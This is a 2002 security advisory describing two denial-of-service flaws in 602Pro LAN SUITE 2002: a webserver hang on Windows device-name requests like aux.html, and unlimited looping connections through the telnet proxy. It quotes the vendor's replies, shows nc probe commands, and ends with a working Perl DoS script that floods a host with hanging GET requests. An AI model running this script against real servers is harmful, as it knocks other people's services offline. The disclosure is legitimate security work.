[UPDATED] Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks

[Stan Bubrouski <stan () ccs neu edu>]

Date: August 3, 2002 (Updated August 20, 2002)
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy

Updates:

Description: There are two denial of service attacks
in 602Pro LAN SUITE 2002 for windows.  The problems
are described below.  I've once again attached an
exploit for the webserver DoS out of sheer frustration.

Problem 1: Webserver/Webmail windows device name DoS attack

This problem is NOT FIXED.  The person from
Software602 who responded to my advisory completely
lacks an understanding of how windows devices work,
and as a result this problem still affects about
%50+ of all their users (using netcraft as a source.)

Response from developer:
"1. AUX is filtered for a long time.
  AUX.HTML is not a problem because of the extension (no aux.html device
exists)."

As you can see the developer does not understand
that on most windows platform aux.whatever or
con.whatever is the same as AUX or CON respectively.
To prove this I used a harmless method of testing
this problem using sites listed on Netcraft as
using Web602.  Here is an example of a non-
vulnerable host:

$ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].com 80
HTTP/1.1 404 The file requested was not found
Server: WEB602/1.04
Content-Type: text/html
Content-Length: 111

Notice the Content-Length is 111, this is the length
of the built-in 404 error message.  BTW using HEAD
does not exibit the problem, only using GET requests
does. Ok now let's look at a vulnerable host:

$ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].net 80
HTTP/1.1 200 OK
Server: WEB602/1.04
Content-type: text/html
Content-length: 0
Connection: close

Notice the Content-Length is 0, if I were to send a
GET request to that host requesting aux.html it
would say Content-Length: 0 but the connection NEVER
closes, it doesn't even time-out.  Doing this
repetitively quickly and efficiently eats up memory
and CPU which will not be released till the process
is killed.

This problem only seems to affect certain versions
of Windows.  Despite what the developers claim it
is a problem and was able to find a couple hundred
vulenrable hosts using the HEAD method I showed
above.  It seems to me from the limited information
I have from having people personally test this Win2k
SP2/3 (EN) seem vulnerable and Windows XP apparently
does not.   As for other Windows OSs I can only
speculate.  Either its the OS or a patch I do not
have access to, either way there is something wrong.

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy allows connections to localhost
essentially allowing you to connect to the proxy
through the proxy, without limit.

Response from developer:
"2. When You set up the IP filter (this is the only one correct way of using
any proxy server!!!! no free service for anybody!!), then nobody else can
not connect out trough Your telnet proxy...
Telnet proxy will be limited by Your notice. In "socksdll.ini" will be line
"TelnetMax=xxx" (where "xxx" will be number of max connections)."

So in a new release this will/is fixed.

#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
# 
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)

use IO::Socket;

if (!$ARGV[2]) {
        print "Usage $0 <hostname> <port> <connections>\n\n";
        exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];


foreach(1...$numc) {
        $sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port");
        print $sock "GET /aux.html HTTP/1.0\r\n";
}